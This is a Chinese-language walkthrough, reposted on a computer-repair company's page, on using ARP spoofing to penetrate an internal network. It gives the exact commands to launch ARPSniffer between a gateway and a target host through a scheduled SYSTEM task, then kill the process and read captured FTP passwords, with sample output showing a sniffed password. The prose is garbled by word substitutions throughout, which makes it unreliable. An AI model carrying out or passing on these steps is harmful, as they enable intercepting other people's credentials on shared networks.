ARP监听渗透内网的方法
假设想打击的主机IP是:61.139.1.79 ,统一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆
第一步:
tracert 61.139.1.1
C:\WIN2000\system32>tracert 61.139.1.1
Tracing route to HACK-4FJ7EARC [61.139.1.1]
over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]
Trace complete.
这就说明了你想打击的主机和你所在的主机在一个关网中那么就有可能
举行ARPSNIFFER了
第二步:看本机IP设置和网卡情况
C:\WIN2000\system32>ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : smscomputer
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 61.139.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.139.1.65
DNS Servers . . . . . . . . . . . : 61.139.1.73
说明只要一块网卡那么在实行ARPSNIFFER的时间就可以不要第五个参数了这个地
方小榕的主页可没有说哟,颠末测试我觉察要是只要一块网卡你第五个参数利用0
的话也只能嗅探到通过自已的数据哟.
从上面我们还可以晓得网关是61.139.1.65
第三步:查看本机时间
C:\WIN2000\system32>net time \\127.0.0.1
\\127.0.0.1 确以后时间是 2003/1/28 下战书 09:13
命令完成乐成
要注意的是这儿的时间是12小时式,用at命令应要24小时式
第四步:编写启动ARPsniffer的bat文件
C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat
注意咯我们没有要第五个参数,要是有多个网卡的话你就要先间接实行arpsniffer表现如下:
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)
Usage: ArpSniffer [/RESET]
第五步:背景运行开始嗅探咯
C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat
注意:这儿的时间要用24小时式
arpsniffer最好拷到system32目录下,记录文件也会天生在这儿
实行完第四步要先安置WINPCAP 2.1驱动
同时arpsniffer要利用最新的0.5版,老版本有不少BUG并且要改注册表重启机子
第六步:看暗码但是天生的记录文件不克不及间接看也不克不及拷贝以是我们只能先结束失
以SYSTEM权限启动的ARPSniffer步伐
C:\winnt\system32>pulist
...................
conime.exe 248 NT AUTHORITY\SYSTEM
explorer.exe 1864 SMSCOMPUTER\Administrator
CSRSS.EXE 2256 NT AUTHORITY\SYSTEM
Arpsniffer.exe 2322 NT AUTHORITY\SYSTEM ----就是它了!
WINLOGON.EXE 2344 NT AUTHORITY\SYSTEM
......................
杀了它
C:\winnt\system32>pskill 2322
PsKill v1.03 - local and remote process killer
Copyright (C) 2000 Mark Russinovich
http://www.sysinternals.com
Process 2322 killed.
C:\winnt\system32>type 1.txt 我的例子中嗅探的是FTP暗码:)
...............
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.139.1.79(21)->61.188.218.179(1404)221
61.139.1.79(21)->61.188.218.179(1404)221
............
............
分外要注意的就是PASS哈:)
----------------------------------------------------
付录:
前台正常实行的表现
C:\>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: Intel(R) 8255x Based Network Connection
Enable IP Router....OK
Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6
Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88
Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88
有时这儿要先表现can not open driver(0)不论它等一下就可以了
Begin Sniffer.........
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|